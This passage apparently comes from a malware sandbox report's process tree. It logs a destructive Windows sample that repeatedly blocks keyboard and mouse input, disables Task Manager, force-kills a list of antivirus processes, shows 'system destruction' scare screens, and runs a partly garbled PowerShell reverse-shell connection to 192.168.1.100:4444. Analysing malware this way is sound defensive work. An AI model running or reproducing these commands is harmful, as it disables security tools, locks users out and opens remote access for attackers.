        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        39⤵
        
        PID:2812
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        37⤵
        
        PID:2272
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mfxnzkpl.cmdline"
        38⤵
        
        PID:1188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        37⤵
        
        PID:2620
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        37⤵
        
        PID:2660
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        37⤵
        
        PID:428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        37⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        37⤵
        
        PID:1716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        37⤵
        
        PID:2352
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        37⤵
        Kills process with taskkill
        
        PID:3064
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        37⤵
        
        PID:1112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        37⤵
        
        PID:2024
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        37⤵
        
        PID:1716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        37⤵
        
        PID:604
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        37⤵
        
        PID:1508
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        37⤵
        
        PID:2784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        37⤵
        
        PID:2156
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        37⤵
        
        PID:280
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        37⤵
        
        PID:1912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        37⤵
        Kills process with taskkill
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        37⤵
        
        PID:1512
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        35⤵
        
        PID:2176
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0pgbbbsv.cmdline"
        36⤵
        
        PID:1608
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        35⤵
        
        PID:300
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5pmioesw.cmdline"
        36⤵
        
        PID:2456
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        35⤵
        
        PID:2444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        35⤵
        
        PID:2612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2468
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        35⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        35⤵
        
        PID:1912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        35⤵
        Kills process with taskkill
        
        PID:2112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        35⤵
        
        PID:1512
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        35⤵
        
        PID:2168
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        35⤵
        
        PID:2392
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        35⤵
        
        PID:904
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        35⤵
        Kills process with taskkill
        
        PID:2660
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        35⤵
        
        PID:2612
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        35⤵
        
        PID:1136
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        35⤵
        Kills process with taskkill
        
        PID:2600
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        35⤵
        
        PID:2576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        35⤵
        
        PID:2072
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        35⤵
        
        PID:580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        35⤵
        
        PID:2256
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        33⤵
        
        PID:1904
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xuqhipwu.cmdline"
        34⤵
        
        PID:1628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        33⤵
        
        PID:1484
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tmhjeqvk.cmdline"
        34⤵
        
        PID:2756
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES935.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC934.tmp"
        35⤵
        
        PID:2992
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        33⤵
        
        PID:2672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        33⤵
        
        PID:2116
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o7yi865y.cmdline"
        34⤵
        
        PID:2156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        33⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2108
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        33⤵
        
        PID:2272
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        33⤵
        
        PID:2332
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        33⤵
        Kills process with taskkill
        
        PID:784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        33⤵
        
        PID:1844
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        33⤵
        
        PID:2016
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        33⤵
        
        PID:2688
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        33⤵
        Kills process with taskkill
        
        PID:428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        33⤵
        Kills process with taskkill
        
        PID:1676
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        33⤵
        
        PID:1228
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        33⤵
        
        PID:1516
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        33⤵
        
        PID:2928
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        33⤵
        Kills process with taskkill
        
        PID:2428
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        33⤵
        
        PID:2352
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        33⤵
        
        PID:1304
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        31⤵
        
        PID:524
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qvtrwj6e.cmdline"
        32⤵
        
        PID:580
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        31⤵
        
        PID:2396
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2dwjofls.cmdline"
        32⤵
        
        PID:2468
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES629.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC628.tmp"
        33⤵
        
        PID:2448
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        31⤵
        
        PID:3020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        31⤵
        
        PID:2688
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\n8tphw_z.cmdline"
        32⤵
        
        PID:1304
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF6D.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF6C.tmp"
        33⤵
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        31⤵
        
        PID:2568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        31⤵
        
        PID:3012
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        31⤵
        Kills process with taskkill
        
        PID:1724
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        31⤵
        
        PID:2684
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        31⤵
        Kills process with taskkill
        
        PID:1304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        31⤵
        
        PID:2568
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        31⤵
        Kills process with taskkill
        
        PID:2712
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        31⤵
        
        PID:2128
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        31⤵
        
        PID:2588
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        31⤵
        Kills process with taskkill
        
        PID:2868
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        31⤵
        
        PID:1576
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        31⤵
        
        PID:3008
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        31⤵
        Kills process with taskkill
        
        PID:1616
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        31⤵
        Kills process with taskkill
        
        PID:1828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        31⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        29⤵
        
        PID:1992
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\oq-1jyiw.cmdline"
        30⤵
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        29⤵
        
        PID:1220
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ei2yup48.cmdline"
        30⤵
        
        PID:2176
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF049.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF048.tmp"
        31⤵
        
        PID:1588
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        29⤵
        
        PID:316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        29⤵
        
        PID:1656
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fe3o4kjh.cmdline"
        30⤵
        
        PID:1676
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1F5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1F4.tmp"
        31⤵
        
        PID:1628
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2380
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        29⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2836
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        29⤵
        
        PID:580
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        29⤵
        
        PID:896
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        29⤵
        
        PID:2784
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        29⤵
        
        PID:1068
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        29⤵
        
        PID:1580
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        29⤵
        
        PID:2112
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Kaspersky.exe /F
        29⤵
        
        PID:2748
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM BitDefender.exe /F
        29⤵
        
        PID:2300
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Sophos.exe /F
        29⤵
        Kills process with taskkill
        
        PID:1724
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM malwarebytes.exe /F
        29⤵
        
        PID:2964
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM CylanceSvc.exe /F
        29⤵
        Kills process with taskkill
        
        PID:2380
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Panda.exe /F
        29⤵
        
        PID:2892
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM EsetService.exe /F
        29⤵
        Kills process with taskkill
        
        PID:2156
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class BlockInput { [DllImport(\"user32.dll\")] public static extern bool BlockInput(bool fBlockIt); }'; [BlockInput]::BlockInput($true)"
        29⤵
        
        PID:1136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        27⤵
        
        PID:1440
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\53j3ebpr.cmdline"
        28⤵
        
        PID:3044
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        27⤵
        
        PID:1892
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ja2djv8z.cmdline"
        28⤵
        
        PID:2480
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE9B4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCE9B3.tmp"
        29⤵
        
        PID:1648
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        27⤵
        
        PID:2368
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        27⤵
        
        PID:1380
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\sjtxdk0v.cmdline"
        28⤵
        
        PID:2972
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF642.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF641.tmp"
        29⤵
        
        PID:1700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        27⤵
        
        PID:556
        
